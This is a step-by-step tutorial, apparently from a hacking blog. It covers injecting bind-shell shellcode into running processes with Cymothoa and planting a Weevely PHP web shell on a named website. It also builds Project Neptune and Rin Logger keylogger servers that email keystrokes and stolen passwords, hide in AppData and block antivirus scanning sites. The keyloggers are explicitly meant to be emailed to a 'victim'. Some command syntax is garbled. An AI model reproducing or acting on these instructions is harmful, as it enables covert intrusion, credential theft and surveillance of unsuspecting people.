Trojans & Backdoors
Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them. But keep in mind it’s a runtime injector so it only works on applications that are already running.
Open your backtrack terminal and type cd /pentest/backdoors/cymothoa
Not type. /cymothoa
The main syntax is: ./cymothoa –p <pid> -s <shellcode_number> [options]
Now type. /cymothoa –S for list of all available shellcodes
To try to infect a currently running process I run to see a list of life processes type ps –aux
I try to launch a version of dictionary to attach on to. /cymothoa –p 1510 –s 0 –y 4444
|-p||process ID 1510|
|-s||shell code number 0 bind /bin/sh to the provided port (requires -y)|
|-4444||that will open up a shell on port 4444|
You can potentially inject any type of backdoor into any program or application of the system. Because it’s a realtime process, it only works on systems you have access to. Once compromised, Cymothoa should be copied to the victim machine to generate stealthy backdoor shells.
Now scan pc with nmap: nmap –sV 192.168.1.3 (Victim IP)
Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application testing post exploitation, and can be used as a stealth backdoor web shell to manage legit web accounts, even free hosted ones. It is currently included in Backtrack and Backbox and other Linux distributions for penetration testing.
Open your backtrack terminal and type cd /pentest/backdoors/web/weevely
Now type ./weevely.py generate <password> <location, where u want to save file> .It will look something like this
. / weevely.py generate rajchandel (Password) /root/Desktop
Then upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type ./weevely.py <url> <password> .It will look something like this
. / weevely http://telecallerjobs.com/webdoor.php rajchandel
Uname –a – print all information
Free – display information about free and used memory on the system
pwd – print name of current/working directory
Df – displays the amount of disk space available on the filesystem containing each file name argument
W – Displays information about the users currently on the machine, and their processes
Ls – List information about the FILEs (the current directory by default)
First Download Project Neptune Keylogger
Open the program
Double click on the program where you downloaded it
First check the button that says “Use Email for Storing Logs” Then change the amount of time the Keylogger sends logs.
In the Email settings tab keep the “smpt.gmail.com” and the port number 587 where it says “Email to Send Keystroke Logs” put your email in that box and in the box under that put the password to your email.
If you want you can change what email it send the logs too, but otherwise use the same email that you put above.
Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step.
Keep all the settings the same, unless you want to disable task manager or block websites now will add some online virus scanning sites to block them —this means that the sites can’t scan the tool for virus.
Go to the installation tab and check the first box in “Startup Settings” Then Choose a place to install in the Installation Directory.
In the Installation Directory I would put it in the “AppData Folder
Then go to Original File Check “Do Nothing with Original File after Install” to keep suspicion level none.
If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.
Now go to ‘Server Creation‘ tab and press ‘Generate New Server’ under ‘server creation’, and give name of your Keylogger and that it… You are done.
You have successfully created a Keylogger server file. Now, simply send this file to your victim via email, once the victim runs our Keylogger, we will key logs every 20 min via emailGoogle+
First Download Rin Logger from Download
Run the keylogger file on your pc and click on “Create new”
Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next
Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs. After that hit “verify now” If you get a message saying verified, your good to go, click next.
Now enable the “Install Keylogger” by clicking on it.
Name the file anything you want and select Installation path as “Application Data”, click next
Click on Next
Now, “Enable Website Viewer” by clicking on it.
Click on Next option.
Now, Enable the “Enable File Binder”.
Click on next
Now Enable the “Steal Password”
Click on Next
Fill all the information by yourself. And click on next.
Now, hit on “Save As” and select the location where you want to save your keylogger server file.
And click on “Compile Server”. Now Compile has been done.
You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.Google+